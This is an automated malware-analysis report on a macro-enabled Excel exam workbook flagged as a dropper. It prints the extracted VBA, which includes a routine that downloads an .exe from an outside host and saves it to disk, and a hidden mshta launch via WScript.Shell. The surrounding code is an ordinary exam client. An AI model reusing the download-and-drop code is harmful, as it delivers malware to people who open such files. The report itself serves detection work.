MALICIOUS
422
Risk Score
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
s.Write H.ResponseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set H = CreateObject("Microsoft.XMLHTTP") -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.yt-e.com/a.exe Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 27935 bytes |
SHA-256: a4a431708675c5a19d9a9697b52cd230a9a1183d2fb1a5d1ca5776835ed7c54b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Download()
Dim H, s
Set H = CreateObject("Microsoft.XMLHTTP")
H.Open "GET", "http://www.yt-e.com/a.exe", False
H.Send
Set s = CreateObject("ADODB.Stream")
s.Type = 1
s.Open
s.Write H.ResponseBody
s.SaveToFile "c:\a.exe", 2
s.Close
End Sub
Sub StartExam()
StudentName = Range("C7").Value
Studentid = Range("C10").Value
StudentClass = Range("C13").Value
ExamID = Range("C16").Value
If StrComp(StudentName, "", 1) = 0 Then
MsgBox "请输入正确的姓名!"
ElseIf StrComp(Studentid, "", 1) = 0 Then
MsgBox "请输入正确的学号!"
ElseIf StrComp(StudentClass, "", 1) = 0 Then
MsgBox "请输入正确的班级!"
ElseIf StrComp(ExamID, "", 1) = 0 Then
MsgBox "请输入正确的考试ID!"
Else
FlushExamInfo
Status = Sheets("开始").Range("L19").Value
If StrComp(Status, "无考试", 1) = 0 Then
MsgBox "当前无考试"
ElseIf StrComp(Status, "考试未开始", 1) = 0 Then
MsgBox "当前考试未开始"
ElseIf StrComp(Status, "考试结束", 1) = 0 Then
MsgBox "当前考试已经结束"
ElseIf StrComp(Status, "考试开始", 1) = 0 Then
GetQuestion
MsgBox "考题获取成功,开始考试!"
End If
End If
End Sub
Sub ConnectServer()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/connectTest"
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "POST", Url, False
xmlhttp.SetRequestHeader "Content-Type", "application/x-www-from-urlencode;charset=UTF-8"
xmlhttp.Send "test=test"
Do While xmlhttp.readyState <> 4
DoEvents
Loop
If xmlhttp.ResponseText = "success" Then
MsgBox "连接考试服务器成功!"
End If
Set xmlhttp = Nothing
End Sub
Sub FlushExamInfo()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetInfo"
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "POST", Url, False
xmlhttp.SetRequestHeader "Content-Type", "application/x-www-from-urlencode;charset=UTF-8"
xmlhttp.Send "test=test"
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Dim i As Integer
temp = Split(xmlhttp.ResponseText, ",")
For i = 0 To UBound(temp)
temp1 = Split(temp(i), ":")
Dim j As Integer
For j = 0 To UBound(temp1)
If StrComp(temp1(0), "{""name""", 1) = 0 Then
Sheets("开始").Range("A1").Value = Replace(Replace(temp1(1), """", ""), "}", "")
ElseIf StrComp(temp1(0), """state""", 1) = 0 Then
Sheets("开始").Range("L19").Value = Replace(Replace(temp1(1), """", ""), "}", "")
End If
Next j
Next i
End Sub
Sub CheckID()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/CheckStudent?"
Url = Url & "id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
temp = Split(xmlhttp.ResponseText, ":")
MsgBox Replace(temp(1), "}", "")
Set xmlhttp = Nothing
End Sub
Sub GetQuestion()
'获取选择题
Xuanze
'获取填空题
TianKong
'获取判断题
PanDuan
'获取简单题
JianDa
'获取操作题
CaoZuo
End Sub
Sub Xuanze()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=0"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
QuestionChoice = sc.Eval("query[" & i & "].choice")
Sheets("选择题").Range("A" & QuestionRow).Value = "选择题" & QuestionNumber
Sheets("选择题").Range("B" & QuestionRow).Value = QuestionTitle
QuestionRow = QuestionRow + 1
Sheets("选择题").Range("B" & QuestionRow).Value = QuestionChoice
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub TianKong()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=2"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
Sheets("填空题").Range("A" & QuestionRow).Value = "填空题" & QuestionNumber
Sheets("填空题").Range("B" & QuestionRow).Value = QuestionTitle
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub PanDuan()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=1"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
Sheets("判断题").Range("A" & QuestionRow).Value = "判断题" & QuestionNumber
Sheets("判断题").Range("B" & QuestionRow).Value = QuestionTitle
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub JianDa()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=3"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
Sheets("简答题").Range("A" & QuestionRow).Value = "简答题" & QuestionNumber
Sheets("简答题").Range("B" & QuestionRow).Value = QuestionTitle
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub CaoZuo()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=4"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
QuestionNumber = sc.Eval("query[" & i & "].number")
QuestionTitle = sc.Eval("query[" & i & "].title")
QuestionAsset = sc.Eval("query[" & i & "].answer")
Sheets("操作题").Range("A" & QuestionRow).Value = "操作题" & QuestionNumber
Sheets("操作题").Range("B" & QuestionRow).Value = QuestionTitle
Sheets("操作题").Range("C" & QuestionRow).Value = QuestionAsset
QuestionRow = QuestionRow + 1
Dim H, s
Set H = CreateObject("Microsoft.XMLHTTP")
H.Open "GET", "http://" & IP + "/GetFile?file=" & QuestionAsset, False
H.Send
Set s = CreateObject("ADODB.Stream")
s.Type = 1
s.Open
s.Write H.ResponseBody
s.SaveToFile "d:\exam\" & QuestionAsset, 2
s.Close
Next i
End Sub
Sub SbmitExam()
StudentName = Range("C7").Value
Studentid = Range("C10").Value
StudentClass = Range("C13").Value
ExamID = Range("C16").Value
If StrComp(StudentName, "", 1) = 0 Then
MsgBox "请输入正确的姓名!"
ElseIf StrComp(Studentid, "", 1) = 0 Then
MsgBox "请输入正确的学号!"
ElseIf StrComp(StudentClass, "", 1) = 0 Then
MsgBox "请输入正确的班级!"
ElseIf StrComp(ExamID, "", 1) = 0 Then
MsgBox "请输入正确的考试ID!"
Else
FlushExamInfo
Status = Sheets("开始").Range("L19").Value
If StrComp(Status, "无考试", 1) = 0 Then
MsgBox "当前无考试"
ElseIf StrComp(Status, "考试未开始", 1) = 0 Then
MsgBox "当前考试未开始"
ElseIf StrComp(Status, "考试结束", 1) = 0 Then
MsgBox "当前考试已经结束"
ElseIf StrComp(Status, "考试开始", 1) = 0 Then
'Sheets("开始").Visible = False
CorrectXuanZe
CorrectPanDuan
CorrectTianKong
CorrectJianDa
MsgBox "试卷提交成功,现在你可以回到作答区查看错题情况!"
End If
End If
End Sub
Sub CorrectXuanZe()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=0"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
StudentAnswerStr = ""
RightCount = 0
For i = 0 To QuestionCount - 1
QuestionAnswer = sc.Eval("query[" & i & "].answer")
StudentAnswer = Sheets("选择题").Range("C" & QuestionRow).Value
If i = 0 Then
StudentAnswerStr = StudentAnswer
Else
StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
End If
If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
RightCount = RightCount + 1
Sheets("选择题").Range("C" & QuestionRow).Interior.Color = 5287936
Else
Sheets("选择题").Range("C" & QuestionRow).Interior.Color = 65535
End If
QuestionRow = QuestionRow + 2
Next i
Url1 = "http://" & IP & "/SetAnswer?"
Url1 = Url1 & "&type=0"
Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
Url1 = Url1 & "&answer=" & StudentAnswerStr
Url1 = Url1 & "&mark=" & RightCount
Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
xmlhttp1.Open "GET", Url1, False
xmlhttp1.Send
Do While xmlhttp1.readyState <> 4
DoEvents
Loop
End Sub
Sub CorrectPanDuan()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=1"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
StudentAnswerStr = ""
RightCount = 0
For i = 0 To QuestionCount - 1
QuestionAnswer = sc.Eval("query[" & i & "].answer")
StudentAnswer = Sheets("判断题").Range("C" & QuestionRow).Value
If i = 0 Then
StudentAnswerStr = StudentAnswer
Else
StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
End If
If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
RightCount = RightCount + 1
Sheets("判断题").Range("C" & QuestionRow).Interior.Color = 5287936
Else
Sheets("判断题").Range("C" & QuestionRow).Interior.Color = 65535
End If
QuestionRow = QuestionRow + 1
Next i
Url1 = "http://" & IP & "/SetAnswer?"
Url1 = Url1 & "&type=1"
Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
Url1 = Url1 & "&answer=" & StudentAnswerStr
Url1 = Url1 & "&mark=" & RightCount
Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
xmlhttp1.Open "GET", Url1, False
xmlhttp1.Send
Do While xmlhttp1.readyState <> 4
DoEvents
Loop
End Sub
Sub CorrectTianKong()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=2"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
StudentAnswerStr = ""
RightCount = 0
For i = 0 To QuestionCount - 1
QuestionAnswer = sc.Eval("query[" & i & "].answer")
StudentAnswer = Sheets("填空题").Range("C" & QuestionRow).Value
If i = 0 Then
StudentAnswerStr = StudentAnswer
Else
StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
End If
If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
RightCount = RightCount + 1
Sheets("填空题").Range("C" & QuestionRow).Interior.Color = 5287936
Else
Sheets("填空题").Range("C" & QuestionRow).Interior.Color = 65535
End If
QuestionRow = QuestionRow + 1
Next i
Url1 = "http://" & IP & "/SetAnswer?"
Url1 = Url1 & "&type=2"
Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
Url1 = Url1 & "&answer=" & StudentAnswerStr
Url1 = Url1 & "&mark=" & RightCount
Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
xmlhttp1.Open "GET", Url1, False
xmlhttp1.Send
Do While xmlhttp1.readyState <> 4
DoEvents
Loop
End Sub
Sub CorrectJianDa()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetQuestion?"
Url = Url & "&type=3"
Url = Url & "&id=" & Sheets("开始").Range("C10").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
StudentAnswerStr = ""
For i = 0 To QuestionCount - 1
QuestionAnswer = sc.Eval("query[" & i & "].answer")
StudentAnswer = Sheets("简答题").Range("C" & QuestionRow).Value
If i = 0 Then
StudentAnswerStr = StudentAnswer
Else
StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
End If
QuestionRow = QuestionRow + 1
Next i
Url1 = "http://" & IP & "/SetAnswer?"
Url1 = Url1 & "&type=3"
Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
Url1 = Url1 & "&answer=" & StudentAnswerStr
Url1 = Url1 & "&mark=-1"
Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
xmlhttp1.Open "GET", Url1, False
xmlhttp1.Send
Do While xmlhttp1.readyState <> 4
DoEvents
Loop
End Sub
Function CreateObjectx86(Optional sProgID, Optional bClose = False)
Static oWnd As Object
Dim bRunning As Boolean
#If Win64 Then
bRunning = InStr(TypeName(oWnd), "HTMLWindow") > 0
If bClose Then
If bRunning Then oWnd.Close
Exit Function
End If
If Not bRunning Then
Set oWnd = CreateWindow()
oWnd.execScript "Function CreateObjectx86(sProgID): Set CreateObjectx86 = CreateObject(sProgID): End Function", "VBScript"
End If
Set CreateObjectx86 = oWnd.CreateObjectx86(sProgID)
#Else
Set CreateObjectx86 = CreateObject("MSScriptControl.ScriptControl")
#End If
End Function
Function CreateWindow()
Dim sSignature, oShellWnd, oProc
On Error Resume Next
sSignature = Left(CreateObject("Scriptlet.TypeLib").GUID, 38)
CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
Do
For Each oShellWnd In CreateObject("Shell.Application").Windows
Set CreateWindow = oShellWnd.GetProperty(sSignature)
If Err.Number = 0 Then Exit Function
Err.Clear
Next
Loop
End Function
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Upload()
IP = Sheets("开始").Range("C19").Value
CreateObject("wscript.shell").Run "http://" & IP + "/Upload"
End Sub
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub SetExam()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/NewExam?"
Url = Url & "name=" & Sheets("教师端").Range("E6").Value
Url = Url & "&start=" & Sheets("教师端").Range("I8").Value
Url = Url & "&end=" & Sheets("教师端").Range("I10").Value
Url = Url & "&count0=" & Sheets("教师端").Range("E12").Value
Url = Url & "&count1=" & Sheets("教师端").Range("E14").Value
Url = Url & "&count2=" & Sheets("教师端").Range("E16").Value
Url = Url & "&count3=" & Sheets("教师端").Range("E18").Value
Url = Url & "&count4=" & Sheets("教师端").Range("E20").Value
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
temp = Split(xmlhttp.ResponseText, ":")
MsgBox Replace(temp(1), "}", "")
Set xmlhttp = Nothing
End Sub
Sub DelExam()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/DelExam?"
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
temp = Split(xmlhttp.ResponseText, ":")
MsgBox Replace(temp(1), "}", "")
Set xmlhttp = Nothing
End Sub
Sub Test()
Sheets("开始").Visible = True
End Sub
Sub GetAllMark()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetAllMark?"
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 2
For i = 0 To QuestionCount - 1
StudentName = sc.Eval("query[" & i & "].name")
Studentid = sc.Eval("query[" & i & "].id")
Studentchoice = sc.Eval("query[" & i & "].choice")
Studentjudgment = sc.Eval("query[" & i & "].judgment")
Studentcompletion = sc.Eval("query[" & i & "].completion")
Sheets("教师端").Range("M" & QuestionRow).Value = StudentName
Sheets("教师端").Range("N" & QuestionRow).Value = Studentid
Sheets("教师端").Range("O" & QuestionRow).Value = Studentchoice * Sheets("教师端").Range("I12").Value
Sheets("教师端").Range("P" & QuestionRow).Value = Studentjudgment * Sheets("教师端").Range("I14").Value
Sheets("教师端").Range("Q" & QuestionRow).Value = Studentcompletion * Sheets("教师端").Range("I16").Value
QuestionRow = QuestionRow + 1
Next i
End Sub
Sub GetAllAnswer()
IP = Sheets("开始").Range("C19").Value
CreateObject("wscript.shell").Run "http://" & IP + "/Download?msg=All"
End Sub
Sub GetAllCheat()
IP = Sheets("开始").Range("C19").Value
Url = "http://" & IP + "/GetCheat?"
Url = Url & "&test=" & Int((99999 * Rnd) + 1)
Dim xmlhttp As Object
Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
xmlhttp.Open "GET", Url, False
xmlhttp.Send
Do While xmlhttp.readyState <> 4
DoEvents
Loop
Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
sc.AddCode ("var query = " & xmlhttp.ResponseText)
QuestionCount = sc.Eval("query.length")
QuestionRow = 39
For i = 0 To QuestionCount - 1
StudentName = sc.Eval("query[" & i & "].name")
Studentid = sc.Eval("query[" & i & "].id")
cheat1 = sc.Eval("query[" & i & "].cheat1")
cheat2 = sc.Eval("query[" & i & "].cheat2")
cheat3 = sc.Eval("query[" & i & "].cheat3")
Sheets("教师端").Range("B" & QuestionRow).Value = StudentName
Sheets("教师端").Range("C" & QuestionRow).Value = Studentid
Sheets("教师端").Range("D" & QuestionRow).Value = cheat1
Sheets("教师端").Range("E" & QuestionRow).Value = cheat2
Sheets("教师端").Range("F" & QuestionRow).Value = cheat3
QuestionRow = QuestionRow + 1
Next i
End Sub
Function CreateObjectx86(Optional sProgID, Optional bClose = False)
Static oWnd As Object
Dim bRunning As Boolean
#If Win64 Then
bRunning = InStr(TypeName(oWnd), "HTMLWindow") > 0
If bClose Then
If bRunning Then oWnd.Close
Exit Function
End If
If Not bRunning Then
Set oWnd = CreateWindow()
oWnd.execScript "Function CreateObjectx86(sProgID): Set CreateObjectx86 = CreateObject(sProgID): End Function", "VBScript"
End If
Set CreateObjectx86 = oWnd.CreateObjectx86(sProgID)
#Else
Set CreateObjectx86 = CreateObject("MSScriptControl.ScriptControl")
#End If
End Function
Function CreateWindow()
Dim sSignature, oShellWnd, oProc
On Error Resume Next
sSignature = Left(CreateObject("Scriptlet.TypeLib").GUID, 38)
CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
Do
For Each oShellWnd In CreateObject("Shell.Application").Windows
Set CreateWindow = oShellWnd.GetProperty(sSignature)
If Err.Number = 0 Then Exit Function
Err.Clear
Next
Loop
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 108032 bytes |
SHA-256: 588ae4e81b4d5c232ab336efba8c26aef5078789a901524191bf2498fb004b1a |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-6412232-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.